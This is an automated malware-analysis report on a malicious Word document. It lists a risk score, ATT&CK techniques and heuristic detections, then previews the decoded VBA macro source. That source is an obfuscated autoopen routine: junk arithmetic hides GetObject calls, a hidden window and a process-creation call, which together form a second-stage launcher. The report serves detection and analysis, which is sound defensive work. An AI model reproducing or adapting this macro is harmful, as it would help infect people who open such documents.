MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The 'autoopen' macro is present and uses a GetObject call, which is a common technique for executing arbitrary code or downloading additional payloads. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further support its malicious nature. The VBA script's obfuscated nature and the use of GetObject indicate an attempt to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Malware.Dsdu-6904730-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dsdu-6904730-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12517 bytes |
SHA-256: 7182e96b62d45f3f50881cb376e52702440886c874998b255422d19ae5bd6034 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "nABUUAkX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "KcxA1D_o"
Attribute VB_Base = "0{5A166FBB-4DE2-4498-B1A6-6FE4E60F4595}{66B7C25F-D9FA-4F83-BB08-F9B09CA772BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "MA_AcAcA"
Sub autoopen()
On Error Resume Next
If lGXZUxU = Hk_1DA_ Then
WX_Ao41B = (633637079)
zAAGAc = (qUAADA * CInt(939119851 _
+ Atn(631635569 * SZw_GQU)) + p4XBDBA + CDbl(QAGkBA - Sqr(NAUQAc / _
CBool(694363531 / 395298971) + oZAAA_ - Rnd(W4QQA1A4))) * 316527312 * 790820533)
vAADAC = (780110503)
End If
If iAZoAB = WUZAZA Then
UCxQ_BB = (869701008)
ZQA_AAB = (w1GAXcAC * CInt(362757127 _
+ Atn(984781346 * PxBkBBA)) + t4AUDA + CDbl(doAUA4AU - Sqr(oB4ZoABX / _
CBool(766367436 / 54354063) + DAAUDGDA - Rnd(ocAkAA))) * 867914749 * 409910776)
jAAwUUA = (176912204)
End If
If N_wkAD = PB4_AA Then
BBCDcAD = (41241393)
MBAA1CDC = (VAAAAAAD * CInt(715117475 _
+ Atn(6170625 * bBwB4Zw)) + JAGkAB + CDbl(iU_wAk - Sqr(u1AAAAAw / _
CBool(790080207 / 57410608) + mABAGQwA - Rnd(iQABA41w))) * 257822242 * 437275507)
lXoxooZA = (340432783)
End If
Set TD4UAQU = GetObject(a_DAxDX + KcxA1D_o.qDQAcUA + KUGcAQ_)
If zoAQAc = JAAAkoBo Then
A4QcZZ = (693632950)
ODAQAZA = (hDAAXQG * CInt(449684569 _
+ Atn(392118058 * GAAXBCCG)) + oD_AADA + CDbl(rAXxAQB - Sqr(zAADUAA / _
CBool(110922244 / 7334196) + uQUUXo - Rnd(kkXAAokA))) * 937414345 * 146116786)
zAZGA1G = (371339082)
End If
If SBQoUAAZ = wXXBco Then
Zw4BA4Aw = (54592852)
cAQAxD = (kQcABABU * CInt(214971490 _
+ Atn(865505036 * Ww1_AAQ)) + rXBx1UQX + CDbl(nAoAAQ - Sqr(wUwAAU / _
CBool(496875445 / 773933083) + P_oAADB - Rnd(o1AAXCU))) * 586595010 * 383261949)
zCxkBXG = (6228362)
End If
If OwQQAQc = B_4UCZA Then
McA_wUQk = (390997271)
oUAABZCU = (skGDBQwC * CInt(397612839 _
+ Atn(672760152 * VCQQAxDx)) + kB41Ao + CDbl(cQxoUBC - Sqr(tAXc4QC / _
CBool(310717484 / 368970770) + jAxU4U - Rnd(mAUAUAkA))) * 820808914 * 521724896)
rGD_UxAD = (68443277)
End If
TD4UAQU.ShowWindow = 24798 - 24798
If LQkBAB4G = JA4oAkw Then
OwAkAQ = (191260931)
F_xGA_Dw = (vUA4Aoox * CInt(470433065 _
+ Atn(709687538 * NCQDBAGA)) + FAB4UZAk + CDbl(qQAAA4 - Sqr(uZUxcA / _
CBool(191594514 / 60853999) + uABCGA4 - Rnd(d_UwAA))) * 687073135 * 33650344)
WACA_A = (525127981)
End If
If wAAoQ1A = KUDZkAxB Then
oxGwABCA = (852264247)
mkAkw_Z = (bAxAZcc * CInt(397263679 _
+ Atn(88082441 * cZxxQ1)) + BB_A4Z_ + CDbl(To_ZAZwQ - Sqr(l1BQUo / _
CBool(593689338 / 921681185) + V4AABX - Rnd(JABAUA))) * 31396914 * 192571848)
vcQZQc_D = (169692709)
End If
GetObject(PUABAwAB + KcxA1D_o.mAABDZk1 + nUwBBAZ1). _
Create@ Pw_AZQ + KcxA1D_o.ucZBDDX + FQkAQ1A + KcxA1D_o.EAAADUA + sCkAkX + KcxA1D_o.WAAADUkA + lQUXUC, zQDC1D_, TD4UAQU, XAA4XC
If vAQAABoc = bQcxAww Then
OQDCAA = (777080703)
UwBBAAD = (fAAowZU1 * CInt(757616636 _
+ Atn(193600679 * AA_AkAA)) + SBUQBX + CDbl(sGAxDAAU - Sqr(iBAABD / _
CBool(812933558 / 398830150) + pAcABAA - Rnd(SGA44oQ))) * 613494098 * 527913501)
CDUxAo = (983808198)
End If
If s_BZXAkX = YA1xAZUG Then
X1AA4k = (318643594)
T_4DAxow = (vAkZQZQ_ * CInt(795498079 _
+ Atn(930015675 * Y1AU4UAo)) + bAAZoA + CDbl(NAZBCA - Sqr(OQAAQABQ / _
CBool(988436226 / 296376060) + WZAxAQ - Rnd(J1Ao4QGB))) * 314002354 * 636511629)
DAkAAA4 = (882903708)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/5cf2623a141a4b5da865f2f0a95cca98.bin
' ===============================================================================
' Module streams:
' Macros/VBA/nABUUAkX - 1106 bytes
' Macros/VBA/KcxA1D_o - 1159 bytes
' Macr
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.